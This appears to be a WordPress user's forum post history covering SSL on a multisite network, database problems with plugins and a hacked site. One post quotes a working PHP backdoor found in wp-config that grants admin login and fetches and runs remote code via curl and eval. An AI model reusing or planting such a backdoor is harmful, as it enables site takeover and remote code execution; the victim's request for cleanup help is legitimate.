milescatlett

I have been able to get around this by renaming the file. My file names show up without an extension. I just rename the file from something like “backup” to “backup.zip”. Hope this helps.

“Secure Front Page” setting makes the sites work correctly. Otherwise they display an error for loading insecure content. It’s not a huge deal, but I feel like some students will struggle with the error. I would like to make it as smooth as possible.

The mu folder only allows for one php file to be loaded. It will not allow plugins contained in folders such as WordPress HTTPS. I tried combining files from the plugin and dropping them into the folder, as well as dropping some of the individual files in, but to no avail.

I want to be able to run a secure network. I have created a multisite install for my senior seminar class, and it must be password protected and run over ssl for security. I am using a combination of plugins, including Better WordPress Security, and everything is running smoothly except that my home page and the home pages of all the sites on the network are loading insecure content. Clicking the setting on WordPress HTTPS solves the problem, but I will need to go into all the sites and set them up individually. I can do this, but it would be better, I think, in some cases if the admin can control the settings for the whole network. I need a way to force all page elements to go to SSL for all the sites cleanly and efficiently.

Thanks for responding so quickly.

No help from anyone? I can access the dashboards of my plugins, but not the subpages. Any ideas on the easiest fix?

So now I installed WP DB Manager and it won’t work either. So it’s not a matter of clearing old data from the db in these specific plugins. It’s something to do with the database and wordpress I guess. I dont’ know. Someone help, please?

It has something to do with my databases, because when I install a fresh install of wordpress the plugins work properly on my server.

Please advise.

Ipstenu, you are a HUGE help. Thanks so much!

Just found this on one of my sites. It looks bad. Anything special I should do? It was in the wp-config file:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'ea5d2f1c4608232e07d3aa3d998e5135'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

Thank you so much!

This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can’t find an iframe or “counter” in the source code. Where is it, so I can know if it’s gone?

I’m not sure what it does, but I have had sites that have been redirecting to other locations (sometimes sleezy, music playing, etc…).

But I have also been upgrading timthumb so those things could be related to that.

@secretja, What do you mean by reupload? Are you installing a fresh theme, or exporting the content of an old site and creating a new wordpress site? I’m afraid to download the whole database for fear it might have malicious code in it…

Thanks for all your help….

I am hosted on Bluehost.com. I was speaking to a customer service rep today. He said he noticed this appearing in an iframe on a non-Wordpress site. I have this on some of my sites also. I would appreciate any information anyone has.

Thanks

Miles